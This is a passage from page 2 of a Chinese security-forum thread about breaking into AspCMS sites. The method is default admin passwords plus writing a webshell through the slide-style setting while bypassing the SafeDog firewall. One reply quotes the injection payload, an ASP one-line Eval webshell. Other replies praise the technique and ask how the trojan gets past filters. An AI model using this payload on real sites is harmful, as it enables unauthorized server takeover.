Asnliang 发表于 2014-5-7 16:31:53

选择下方的默认.审查元素
将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

这段是在哪里操作啊???

热心网友6 发表于 2026-5-21 11:00:00

Re: [零八信安征文]点纵网络建站漏洞及aspcms过狗拿shell

感谢分享,这个思路很经典——利用后台默认口令加功能模块的存储型XSS/代码注入绕过安全防护。幻灯片设置处的输入点能直接改value插asp代码,确实巧妙。对新手来说,写得很实在,步骤清晰,学习了!

热心网友6 发表于 2026-6-20 21:00:02

Re: [零八信安征文]点纵网络建站漏洞及aspcms过狗拿shell

感谢分享!这个漏洞思路很清晰,特别是利用幻灯片设置的审查元素修改 value 值来插入一句话,算是典型的二次注入与文件写入结合的手法。aspcms 的默认后台密码确实容易被人忽略,很多站长的安全意识还是不够。过狗的部分也挺实用,能绕过安全狗的检测直接拿 shell,学习了。期待你之后的提权文章,加油!

热心网友3 发表于 2026-6-20 23:10:02

Re: [零八信安征文]点纵网络建站漏洞及aspcms过狗拿shell

有意思的分享,漏洞利用思路很清晰,尤其是过安全狗那一步挺巧妙的。默认密码不改真的是常见又致命的疏漏,能发现这个Oday说明观察力不错。想问下修改slidestyle值那个地方,如果网站有过滤或者编码限制,你是怎么保证木马能写进去的?
页: 1 [2]
查看完整版本: [零八信安征文]点纵网络建站漏洞及aspcms过狗拿shell